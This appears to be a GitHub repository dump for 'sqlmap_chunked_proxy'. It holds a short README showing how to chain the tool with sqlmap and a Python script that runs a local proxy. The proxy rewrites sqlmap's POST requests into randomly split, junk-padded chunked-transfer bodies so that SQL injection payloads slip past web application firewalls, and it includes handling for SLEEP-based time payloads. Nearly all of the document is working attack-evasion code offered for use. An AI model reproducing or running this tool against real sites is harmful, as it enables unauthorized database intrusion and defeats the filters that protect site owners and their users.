├── README.md
├── Wireshark.jpeg
├── sqlmap.jpeg
├── sqlmap_chunked_proxy.jpeg
└── sqlmap_chunked_proxy.py


/README.md:
--------------------------------------------------------------------------------
1 | ## sqlmap_chunked_proxy
2 | ![](sqlmap_chunked_proxy.jpeg)
3 | ![](sqlmap.jpeg)
4 | ![](Wireshark.jpeg)
5 | ## Usage:
6 | ```bash
7 | python3 sqlmap_chunked_proxy.py
8 | sqlmap -u '' --data '' --proxy=http://127.0.0.1:9999
9 | ```


--------------------------------------------------------------------------------
/Wireshark.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/is101101/sqlmap_chunked_proxy/39c10447c0b7a6293678d07361dc002b54a444ad/Wireshark.jpeg


--------------------------------------------------------------------------------
/sqlmap.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/is101101/sqlmap_chunked_proxy/39c10447c0b7a6293678d07361dc002b54a444ad/sqlmap.jpeg


--------------------------------------------------------------------------------
/sqlmap_chunked_proxy.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/is101101/sqlmap_chunked_proxy/39c10447c0b7a6293678d07361dc002b54a444ad/sqlmap_chunked_proxy.jpeg


--------------------------------------------------------------------------------
/sqlmap_chunked_proxy.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | # -*- coding: utf-8 -*-
  3 | 
  4 | 
  5 | """
  6 | @author: 4rat
  7 | @time: 2019/3/11 23:33
  8 | """
  9 | 
 10 | from socket import *
 11 | import random
 12 | import string
 13 | import time
 14 | import HackRequests
 15 | import re
 16 | 
 17 | def Confuse():
 18 |     Confuse = ''.join(random.sample(string.ascii_letters + string.digits,random.randint(1,9)))
 19 |     return Confuse
 20 | 
 21 | def payloadlistnum(s):
 22 |     while True:
 23 |         n = random.randint(1, len(s))
 24 |         num = len(s) / n
 25 |         if num < 9:
 26 |             return n
 27 | 
 28 | def payloadlist(s, n):
 29 |     fn = len(s) // n
 30 |     rn = len(s) % n
 31 |     sr = []
 32 |     ix = 0
 33 |     for i in range(n):
 34 |         if i < rn:
 35 |             sr.append(s[ix:ix + fn + 1])
 36 |             ix += fn + 1
 37 |         else:
 38 |             sr.append(s[ix:ix + fn])
 39 |             ix += fn
 40 |     return (sr)
 41 | 
 42 | def payload2(s,n):
 43 |     payload2 =''
 44 |     for i in payloadlist(s, n):
 45 |         if len(i) == 0:
 46 |             pass
 47 |         else:
 48 |             payload2 = payload2 + str(len(i))+';'+Confuse()+'\n'+str(i)+'\n'
 49 |     payload2 = payload2 + '0' + '\n' + '\n'
 50 |     return (payload2)
 51 | 
 52 | def tamper(s):
 53 |     n = payloadlistnum(s)
 54 |     return (payload2(s,n))
 55 | 
 56 | def httphead(slist):
 57 |     sj = 0
 58 |     httphead1 = []
 59 |     for i in slist:
 60 |         if 'Content-Length:' in i:
 61 |             xg = slist[sj] = 'Transfer-Encoding: Chunked\r'
 62 |             httphead1.append(xg)
 63 |         else:
 64 |             sj += 1
 65 |             httphead1.append(i)
 66 |     return httphead1
 67 | 
 68 | def httppostpayload(slist):
 69 |     httppostpayload = slist[-1]
 70 |     return httppostpayload
 71 | 
 72 | HOST = '127.0.0.1'
 73 | PORT = 9999
 74 | ADDR = (HOST, PORT)
 75 | ProxyServer = socket(AF_INET, SOCK_STREAM)   
 76 | ProxyServer.bind(ADDR)                       
 77 | ProxyServer.listen(5)                        
 78 | hack = HackRequests.hackRequests()
 79 | print("\033[1;33m[*] Waiting for Client connection \033[0m")
 80 | while True:
 81 |     tcpCliSock, addr = ProxyServer.accept()
 82 |     print("\033[1;33m[+] Connection Succeeded \033[0m")
 83 |     s = tcpCliSock.recv(1024).decode('utf-8')   
 84 |     if 'SLEEP' in s:
 85 |         payloadtime = re.findall(r'SLEEP%28(.*?)%29',s)[0]
 86 |         time.sleep(int(payloadtime))
 87 |         slist = s.split('\n')
 88 |         headerslist = httphead(slist)
 89 |         s = httppostpayload(slist)
 90 |         httppost = tamper(s)
 91 |         headerslist[-1] = httppost
 92 |         httpdata = ''
 93 |         for i in headerslist:
 94 |             httpdata = httpdata + i.replace('\r', '\n')
 95 |         httpdata = httpdata + i.replace('\r', '\n')
 96 |         print("\033[1;33m[+] chunked Succeeded \033[0m")
 97 |         raw = httpdata
 98 |         aa = hack.httpraw(raw)
 99 |         time.sleep(int(payloadtime))
100 |         payloaddata = aa.text()
101 |         tcpCliSock.sendall(bytes(payloaddata, 'utf-8')) 
102 |         tcpCliSock.close()
103 |         continue
104 |     slist = s.split('\n')
105 |     headerslist = httphead(slist)
106 |     s  = httppostpayload(slist)
107 |     httppost = tamper(s)
108 |     headerslist[-1] = httppost
109 |     httpdata = ''                                  
110 |     for i in headerslist:
111 |         httpdata = httpdata + i.replace('\r','\n')
112 |     httpdata = httpdata + i.replace('\r', '\n')
113 |     print("\033[1;33m[+] chunked Succeeded \033[0m")
114 |     raw = httpdata
115 |     aa = hack.httpraw(raw)
116 |     payloaddata = aa.text()
117 |     payloaddata = payloaddata
118 |     tcpCliSock.sendall(bytes(payloaddata, 'utf-8'))       
119 |     tcpCliSock.close()
120 | 


--------------------------------------------------------------------------------